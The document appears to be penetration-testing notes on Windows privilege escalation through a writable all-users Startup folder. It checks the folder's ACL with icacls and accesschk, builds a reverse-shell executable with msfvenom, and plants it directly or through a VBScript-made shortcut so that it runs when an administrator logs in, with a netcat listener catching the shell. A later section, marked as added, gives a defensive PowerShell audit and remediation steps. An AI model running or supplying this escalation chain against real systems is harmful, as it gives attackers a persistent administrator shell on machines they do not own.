Startup Apps

Similar to AutoRun. Windows stores the Startup applications that run for every user who logs in under:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

The files in this directory are shortcuts (lnk files).

#In the low-privileged shell, run:
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
#Check whether the BUILTIN\Users group has full access (F)

#You can also run accesschk.exe to check for (F)
accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

#Generate payload:
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=port -f exe -o x.exe

#METHOD 1
#Transfer it to
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

#Start a netcat listener and simulate a login from admin to get a shell

#METHOD 2
#Transfer the reverse shell exe to C:\Temp\reverse.exe
#Create a VBScript that creates a shortcut to that exe in the Startup directory:
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\Temp\reverse.exe"
oLink.Save

#Transfer the VBScript to target machine
#Run the script to create a shortcut:
cscript CreateShortcut.vbs

#Simulate an admin login to get a shell
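The same weakness seen from the defender's side: an added PowerShell audit (not part of the original notes) that flags low-privileged principals holding write rights on the all-users Startup folder and resolves every .lnk in it to its target, owner and signature status. It assumes only the Startup path discussed above and the built-in WScript.Shell COM object.

```powershell
# Added audit example, not from the original page. Assumes the all-users
# Startup path discussed above; run from any PowerShell session.
$startup = Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\Startup'

# Principals that should never be able to write into a machine-wide Startup folder.
$lowPrivPrincipals = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
# Any of these rights lets a user drop a new shortcut (Write covers WriteData/AppendData).
$writeRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

Write-Host "Auditing ACL on $startup"
$acl = Get-Acl -Path $startup
foreach ($ace in $acl.Access) {
    $id = $ace.IdentityReference.Value
    if ($ace.AccessControlType -eq 'Allow' -and
        $lowPrivPrincipals -contains $id -and
        (($ace.FileSystemRights -band $writeRights) -ne 0)) {
        # This is the condition the icacls/accesschk checks above look for (F, M or W).
        Write-Warning "Weak ACL: $id has $($ace.FileSystemRights) on the all-users Startup folder"
    }
}

# Resolve each shortcut so an unexpected target (e.g. something under a user-writable
# path like C:\Temp) stands out; owner and creation time help scope who added it and when.
$shell = New-Object -ComObject WScript.Shell
Get-ChildItem -Path $startup -Filter '*.lnk' -Force | ForEach-Object {
    $lnk = $shell.CreateShortcut($_.FullName)
    $status = 'n/a'
    if ($lnk.TargetPath -and (Test-Path -LiteralPath $lnk.TargetPath)) {
        $status = (Get-AuthenticodeSignature -FilePath $lnk.TargetPath).Status
    }
    [pscustomobject]@{
        Shortcut  = $_.Name
        Target    = $lnk.TargetPath
        Arguments = $lnk.Arguments
        Owner     = (Get-Acl -Path $_.FullName).Owner
        Created   = $_.CreationTime
        Signature = $status
    }
} | Format-Table -AutoSize
```

Remediation is to remove the offending Allow ACE (for example with icacls /remove) so only Administrators and SYSTEM can modify the folder, and to treat any unsigned or temp-path target as an incident to investigate.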
